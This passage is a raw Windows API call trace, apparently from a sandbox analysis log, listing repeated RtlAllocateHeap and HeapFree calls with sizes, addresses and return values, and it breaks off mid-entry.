[0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.573] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.573] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.574] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.574] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.575] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.575] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.576] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.576] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.577] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.577] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.578] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.578] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.579] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.579] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.580] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.580] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: 